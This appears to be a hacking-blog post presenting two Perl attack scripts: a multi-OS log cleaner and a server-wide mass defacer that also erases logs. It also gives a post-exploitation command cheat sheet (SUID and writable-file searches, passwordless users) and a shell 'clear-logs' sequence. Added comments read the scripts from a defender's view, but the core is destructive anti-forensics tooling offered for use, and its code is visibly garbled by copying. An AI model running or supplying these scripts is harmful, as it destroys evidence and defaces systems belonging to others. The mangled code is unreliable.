enero 17, 2012
12:20

LOG CLEANER !!!! PERL

[perl]
#!usr/bin/perl -w #Warnings enabled!
#Log cleaner version Public
#Give Credits Where Needed – Kouros!
#This took time, Hope you fucking use it
#Report bugs to info@Kouros-bl4ckhat.com
#NOTE – YOU MUST BE ROOT!
#
# Reviewer note (defensive reading): this is an anti-forensics tool. It prompts
# for an OS name on STDIN and unlink()s a fixed list of files for that OS - the
# @linux, @sunos, @aix and @irix lists assigned further down inside the loop.
# The targets are the artefacts an incident responder relies on: login
# accounting (utmp/wtmp/lastlog), su/cron/mail logs, process accounting (pacct)
# and root's shell history. Once unlinked they are gone from the host short of
# disk carving, so the controls that matter are remote log forwarding, audit
# rules or file-integrity monitoring on these paths, and treating their absence
# on a suspect host as an indicator in its own right.
#
# Reviewer note (listing quality): as pasted this does not compile. The curly
# quotes (“ ” ‘ ’) are not Perl string delimiters, the trailing `n` in the
# messages looks like a `\n` whose backslash was lost in extraction, and the
# shebang is missing the leading `/`. There is no `use strict`, so $os and the
# four @lists are package globals.
print qq^
####################################
# Log Cleaner 3.0 PUBLIC #
# Kouros #
# #
# Virangar Security Team #
# http://www.Kouros-bl4ckhat.com #
####################################
^;
# Prompt/dispatch loop. There is no `last` or `exit` anywhere in the body, so
# it only ends when the process is killed (EOF on STDIN leaves $os undef and
# keeps looping).
while(1) {
print “Enter Which OS: “; #User Input
chomp($os = <STDIN>); #Takes it into memory
if($os eq “help”){
print “[+]Enter Your OS! Choose from ‘linux’, ‘aix’, ‘sunos’, ‘irix’n”;
print “[+]Hit enter with OS, Let the script do its workn”;
print “[+]Note: You MUST Be Root!n”;
print “[+]Contact Info[at]Kouros-bl4ckhat [dot] Com”;
print “[+]For Bug finds… Have Fun!n”;
print “[+] – Kouros”;
}
# Per-OS dispatch. Each branch walks the matching list and unlink()s every
# entry, printing the error ($!) for anything that could not be removed.
# The lists are assigned at the bottom of this same loop body, i.e. after this
# point, so on the very first pass through the loop they are still empty.
if($os eq “linux”){ #If linux typed, do the following and start brackets
foreach my $logphile(@linux) {
unlink($logphile) || print “[-]Fucked up: “$logphile” : $!n”;
}
} elsif($os eq “sunos”){ #If sunos typed, do the following and start brackets
foreach my $logphile(@sunos) {
unlink($logphile) || print “[-] Fucked up: “$logphile” : $!n”;
}
} elsif($os eq “aix”){ #If aix typed, do the following and start brackets
foreach my $logphile(@aix) {
unlink($logphile) || print “[-] Fucked up: “$logphile” : $!n”;
}
} elsif($os eq “irix”){ #If irix typed, do the following and start bracket
foreach my $logphile(@irix) {
unlink($logphile) || print “[-] Fucked up: “$logphile” : $!n”;
}
} else { print”Umm WTF !?n”; }
# Target lists. For a defender these read as the set of artefacts to monitor on
# each platform: system log, su log, utmp/wtmp(x), lastlog, printer and cron
# logs, process accounting, failed/login logs, crash dumps. The bare `{ }`
# blocks around each assignment add no scoping - the arrays are globals.
#Logs of Irix Systems
{ #Start Irix Bracket
@irix = (“/var/adm/SYSLOG”, “/var/adm/sulog”, “/var/adm/utmp”, “/var/adm/utmpx”,
“/var/adm/wtmp”, “/var/adm/wtmpx”, “/var/adm/lastlog/”,
“/usr/spool/lp/log”, “/var/adm/lp/lp-errs”, “/usr/lib/cron/log”,
“/var/adm/loginlog”, “/var/adm/pacct”, “/var/adm/dtmp”,
“/var/adm/acct/sum/loginlog”, “var/adm/X0msgs”, “/var/adm/crash/vmcore”,
“/var/adm/crash/unix”) #End Array
} #End Irix Bracket
#Logs of Aix Systems
{ #Start Aix Bracket
@aix = (“/var/adm/pacct”, “/var/adm/wtmp”, “/var/adm/dtmp”, “/var/adm/qacct”,
“/var/adm/sulog”, “/var/adm/ras/errlog”, “/var/adm/ras/bootlog”,
“/var/adm/cron/log”, “/etc/utmp”, “/etc/security/lastlog”,
“/etc/security/failedlogin”, “usr/spool/mqueue/syslog”) #End Array
} #End Aix Bracket
#Logs of SunOS Systems
{ #Start SunOS Bracket
@sunos = (“/var/adm/messages”, “/var/adm/aculogs”, “/var/adm/aculog”,
“/var/adm/sulog”, “/var/adm/vold.log”, “/var/adm/wtmp”,
“/var/adm/wtmpx”, “/var/adm/utmp”, “/var/adm/utmpx”,
“/var/adm/log/asppp.log”, “/var/log/syslog”,
“/var/log/POPlog”, “/var/log/authlog”, “/var/adm/pacct”,
“/var/lp/logs/lpsched”, “/var/lp/logs/requests”,
“/var/cron/logs”, “/var/saf/_log”, “/var/saf/port/log”) #End Array
} #End Sunos bracket
#Logs of Linux Systems
# Linux target list: syslog/auth/accounting, ftp, http, mail, news and samba
# logs plus root's shell history. It also names whole directories (/var/log,
# /var/adm, /var/spool/*, /var/lock/samba) and some non-log files
# (/etc/mail/access, /root/.Xauthority). unlink() is for files, so the
# directory entries only produce the error line; the non-log files are
# collateral damage that a responder may notice before the missing logs.
{ #Start Linux Bracket
@linux = (“/var/log/lastlog”, “/var/log/telnetd”, “/var/run/utmp”,
“/var/log/secure”,”/root/.ksh_history”, “/root/.bash_history”,
“/root/.bash_logut”, “/var/log/wtmp”, “/etc/wtmp”,
“/var/run/utmp”, “/etc/utmp”, “/var/log”, “/var/adm”,
“/var/apache/log”, “/var/apache/logs”, “/usr/local/apache/logs”,
“/usr/local/apache/logs”, “/var/log/acct”, “/var/log/xferlog”,
“/var/log/messages/”, “/var/log/proftpd/xferlog.legacy”,
“/var/log/proftpd.xferlog”, “/var/log/proftpd.access_log”,
“/var/log/httpd/error_log”, “/var/log/httpsd/ssl_log”,
“/var/log/httpsd/ssl.access_log”, “/etc/mail/access”,
“/var/log/qmail”, “/var/log/smtpd”, “/var/log/samba”,
“/var/log/samba.log.%m”, “/var/lock/samba”, “/root/.Xauthority”,
“/var/log/poplog”, “/var/log/news.all”, “/var/log/spooler”,
“/var/log/news”, “/var/log/news/news”, “/var/log/news/news.all”,
“/var/log/news/news.crit”, “/var/log/news/news.err”,
“/var/log/news/news.notice”,
“/var/log/news/suck.err”, “/var/log/news/suck.notice”,
“/var/spool/tmp”, “/var/spool/errors”, “/var/spool/logs”, “/var/spool/locks”,
“/usr/local/www/logs/thttpd_log”, “/var/log/thttpd_log”,
“/var/log/ncftpd/misclog.txt”, “/var/log/nctfpd.errs”,
“/var/log/auth”) #End array
} #End linux bracket
} #Ends Loop
[/perl]
##################################################################################
=> Mass deface- I’ve a perl to mass deface sites on the server. execute it as the same way
as above.
[perl]
# MSRml V 0.1 #
# #
# MOROCCO.SECURITY.RULZ mass defacer and log eraser #
# #
# coded by PRI[ll #
# #
# !!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!! #
# #
# 05/07/2005 #
# #
# usage : perl MSRml.pl <path to index> #
# #
# example : perl MSRml.pl /tmp/index.html #
# #
# the_r00t3r@hotmail.com #
#!/usr/bin/perl
# Reviewer note (defensive reading): destructive two-stage script. Stage one
# takes a path from @ARGV and, via `find / ... -exec cp`, copies that file over
# every file named index*, main*, home* or default* on the whole filesystem,
# not just web roots. Stage two is log destruction: an existence check then
# `rm -rf` for a fixed list of log files/directories and root's shell history,
# followed by four `find / -name ... -exec rm -rf` sweeps. For a responder the
# combined signature is: many overwritten files with identical content and
# near-identical mtimes, /var/log and /var/adm absent, wtmp/utmp gone, empty
# root history, and unrelated files whose names begin with "log" missing.
# Evidence of the intrusion itself then has to come from off-host sources
# (forwarded syslog, upstream proxy/WAF logs, network captures, backups) or
# from recovering deleted inodes.
# Reviewer note (listing quality): the text was mangled by copy/paste and does
# not run as shown - `33[01;34m` is an ANSI colour sequence whose `\033` lost
# its backslash, the trailing `n` are dropped `\n`, the `-exec ... {} ;` lack
# the `\;` escape, and straight and curly quotes are mixed. Every command is a
# single string handed to the shell by `system`, with the user-supplied $index
# interpolated into it unquoted.
use strict;
my $index = $ARGV[0];
# No argument: fall through to the usage branch at the bottom of the file.
if ($ARGV[0])
{
# The supplied index file must exist; otherwise the error branch below exits.
if( -e $index )
{
system “echo -e “33[01;34mStarted MSRml V0.1 by PRI[ll Ok !!33[01;37m"n";
system "echo -e "33[01;37mDefacing all homepages ..."n";
# Stage one: system-wide overwrite of every file matching the four patterns.
system "find / -name "index*" -exec cp $index {} ;";
system "find / -name "main*" -exec cp $index {} ;";
system "find / -name "home*" -exec cp $index {} ;";
system "find / -name "default*" -exec cp $index {} ;";
system "echo -e "33[01;37m[+] done ! all sites in this box are defaced !”n”;
system “echo -e “33[01;37m----------------------------------------------------------"n";
system "echo -e "33[01;37mCleaning up logs ..."n";
system "echo -e "33[01;34m---------erasing default log files (too fast
=))---------33[01;37m"n";
# Stage two: one `if -e / rm -rf / echo` block per artefact, starting here.
if( -e "/var/log/lastlog" )
{
system 'rm -rf /var/log/lastlog';
system "echo -e "33[01;37m [*]/var/log/lastlog -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/log/lastlog – No such file or directory33[01;37m"n";
}
# wtmp (the login/logout record behind `last`) in both of its historical
# locations; its loss is what blanks the `last` output a responder would
# normally start from. The enclosing `if( -e $index )` block opens earlier
# in the file.
if( -e "/var/log/wtmp" )
{
system 'rm -rf /var/log/wtmp';
system "echo -e "33[01;37m [*]/var/log/wtmp -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/log/wtmp – No such file or directory33[01;37m"n";
}
if( -e "/etc/wtmp" )
{
system 'rm -rf /etc/wtmp';
system "echo -e "33[01;37m [*]/etc/wtmp -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/etc/wtmp – No such file or directory33[01;37m"n";
}
# utmp (currently logged-in sessions, behind `w`/`who`), again in two locations.
if( -e "/var/run/utmp" )
{
system 'rm -rf /var/run/utmp';
system "echo -e "33[01;37m [*]/var/run/utmp -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/run/utmp – No such file or directory33[01;37m"n";
}
if( -e "/etc/utmp" )
{
system 'rm -rf /etc/utmp';
system "echo -e "33[01;37m [*]/etc/utmp -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/etc/utmp – No such file or directory33[01;37m"n";
}
# Removing /var/log wholesale (and /var/logs, /var/adm below) takes out every
# log on the system, including ones unrelated to the intrusion. The directory's
# absence is itself the indicator; daemons that still hold the old files open
# may keep the unlinked content reachable while they are running.
if( -e "/var/log" )
{
system 'rm -rf /var/log';
system "echo -e "33[01;37m [*]/var/log -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/log – No such file or directory33[01;37m"n";
}
if( -e "/var/logs" )
{
system 'rm -rf /var/logs';
system "echo -e "33[01;37m [*]/var/logs -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/logs – No such file or directory33[01;37m"n";
}
if( -e "/var/adm" )
{
system 'rm -rf /var/adm';
system "echo -e "33[01;37m [*]/var/adm -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/adm – No such file or directory33[01;37m"n";
}
# Web-server log directories in the locations the author expects
# (/var/apache/log{,s} here, /usr/local/apache/log{,s} further down). Access
# logs are the primary record of how a defacement arrived, which is why they
# are targeted; keep copies off-host.
if( -e "/var/apache/log" )
{
system 'rm -rf /var/apache/log';
system "echo -e "33[01;37m [*]/var/apache/log -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/apache/log – No such file or directory33[01;37m"n";
}
if( -e "/var/apache/logs" )
{
system 'rm -rf /var/apache/logs';
system "echo -e "33[01;37m [*]/var/apache/logs -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/apache/logs – No such file or directory33[01;37m"n";
}
if( -e "/usr/local/apache/log" )
{
system 'rm -rf /usr/local/apache/log';
system "echo -e "33[01;37m [*]/usr/local/apache/log -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/usr/local/apache/log – No such file or
directory33[01;37m"n";
}
if( -e "/usr/local/apache/logs" )
{
system 'rm -rf /usr/local/apache/logs';
system "echo -e "33[01;37m [*]/usr/local/apache/logs -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/usr/local/apache/logs – No such file or
directory33[01;37m"n";
}
# root's shell history files. Only the on-disk copy is removed here; a shell
# that is still running keeps its own history in memory until it exits.
if( -e "/root/.bash_history" )
{
system 'rm -rf /root/.bash_history';
system "echo -e "33[01;37m [*]/root/.bash_history -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/root/.bash_history – No such file or directory33[01;37m"n";
}
if( -e "/root/.ksh_history" )
{
system 'rm -rf /root/.ksh_history';
system "echo -e "33[01;37m [*]/root/.ksh_history -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/root/.ksh_history – No such file or directory33[01;37m"n";
}
system "echo -e "33[01;37m[+] —–done all default log and bash_history files erased !!”n”;
system “echo -e “33[01;34m---------Now Erasing the rest of the machine log files (can be
long :S)---------33[01;37m"n";
# Filesystem-wide sweeps by name. `log*` matches on basename, so as intended it
# would also remove unrelated files and directories whose names start with
# "log" (e.g. the login binary), which tends to break the host and is itself a
# tell-tale. The `*.bash_history`, `*.bash_logout` and `*.log` patterns are
# unquoted, so the shell may expand them in the current directory before find
# sees them.
system 'find / -name *.bash_history -exec rm -rf {} ;';
system "echo -e "33[01;37m[*] all *.bash_history files -erased Ok!”n”;
system ‘find / -name *.bash_logout -exec rm -rf {} ;’;
system “echo -e “33[01;37m[*] all *.bash_logout files -erased Ok!”n”;
system ‘find / -name “log*” -exec rm -rf {} ;’;
system “echo -e “33[01;37m[*] all log* files -erased Ok!”n”;
system ‘find / -name *.log -exec rm -rf {} ;’;
system “echo -e “33[01;37m[*] all *.log files -erased Ok!”n”;
system “echo -e “33[01;34m-------[+] !done all log files erased![+]——-33[01;37m"n";
system "echo -e "33[01;34m---------------------------------------------------33[01;37m"n";
system "echo -e "33[01;34m-----------------MSRml V 0.1----------------------33[01;37m"n";
}
# Index path given but not found: report and exit.
else
{
system "echo -e "33[01;31m[-] Failed ! the path to u’re index could not be found
!33[01;37m"n";
exit;
}
}
# No argument supplied: print the usage banner and exit.
else
{
system "echo -e "33[01;37m!!Morocco.Security.Rulz mass defacer and log eraser !!"n";
system "echo -e "33[01;37m!!!!!!!!!!!!!!!!!!coded by PRI[ll!!!!!!!!!!!!!!!!!!!!!!!!"n";
system "echo -e
"33[01;31m!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!33[01;37m"n";
system "echo -e "33[01;37musage : perl $0 <path too u're index>"n";
system "echo -e "33[01;37mexample : perl $0 /tmp/index.html"n";
exit;
}
[/code]
##################################################################################
=> Important Commands-
./../mainfile.php – Config file.
ls -la – Lists directories.
ifconfig {eth0 etc} – Ipconfig equiv.
ps aux – Shows running processes.
gcc in_file -o out_file – Compile c file.
cat /etc/passwd – Lists accounts.
sudo – Superuser Do run a command as root provided you have perms
in /etc/sudoers.
id – Tells you what user you’re logged in as.
which wget curl w3m lynx – Checks to see which downloaders are present.
uname -r – Shows all release info (or) cat /etc/release.
uname -a – Shows all kernel info (or) cat /etc/issue
last -30 – Last logged 30 ip’s can change to desired number.
useradd – Create new user account.
usermod – Modify user account.
w – See who is currently logged on.
locate password.txt – Locates password.txt in current dir; can use *.
rm -rf / – Please be careful with this command, I cannot stress this enough.
arp -a – Lists other machines are on the same subnet.
lsattr -va – ls file attributes on linux second extended file system
find / -type f -perm -04000 -ls – Finds suid files.
find . -type f -perm -04000 -ls – Finds suid files in current dir.
find / -type f -perm -02000 -ls – Finds all sgid files.
find / -perm -2 -ls – Finds all writable files and folders.
find . -perm -2 -ls – Finds all writable files and folders in current dir.
find / -type f -name .bash_history – Finds bash history.
netstat -an | grep -i listen – shows open ports.
cut -d: -f1,2,3 /etc/passwd | grep :: – From memory creates a user
with no pass.
find /etc/ -type f -perm -o+w 2> /dev/null – Write in /etc/passwd?.
cat /proc/version /proc/cpuinfo – Cpu info.
locate gcc- Finds gcc if installed.
set – Display system variables.
echo $path- Echo current path.
lsmod- Dumps kernel modules.
mount/df- Check mounted file system.
rpm -qa- Check patch level for RedHat 7.0.
dmesg- Check hardware info.
cat /etc/syslog.conf – Log file.
uptime – Uptime check.
cat /proc/meminfo – Memory check.
find / -type f -perm -4 -print 2> /dev/null- Find readable files.
find / -type f -perm -2 -print 2> /dev/null – Find writable files.
chmod ### $folder – Chmod folder.
ls -l -b – Verbosely lists directories
————-clear-logs—————–
# Defender note: this is the same artefact set as the two scripts above, as a
# shell paste. Everything below is evidence destruction, and it is noisy: it
# removes whole directories (/var/log, /var/adm, the apache log dirs), login
# accounting (utmp, wtmp) and root's shell history, then sweeps the filesystem
# for *.bash_history, *.bash_logout, log* and *.log by name. A host where these
# paths are missing should be treated as compromised, not as clean. Logs that
# were forwarded off-host, audit records of the unlink calls themselves, and
# file-system journals or backups are where the record survives.
rm -rf /tmp/logs
# $HISTFILE is the current shell's on-disk history; if it is unset this rm has
# no operand.
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
# Clears the running shell's in-memory history list only; it does not touch
# files, which is why $HISTFILE is removed separately above.
history -c
# Name-based sweeps. `log*` matches any basename starting with "log", not just
# log files, so this also removes unrelated binaries and directories. The curly
# quotes on the third line and the unescaped `;` terminators are paste
# artefacts; find rejects -exec without a `\;` terminator, so these lines do
# not run as shown.
find / -name *.bash_history -exec rm -rf {} ;
find / -name *.bash_logout -exec rm -rf {} ;
find / -name “log*” -exec rm -rf {} ;
find / -name *.log -exec rm -rf {} ;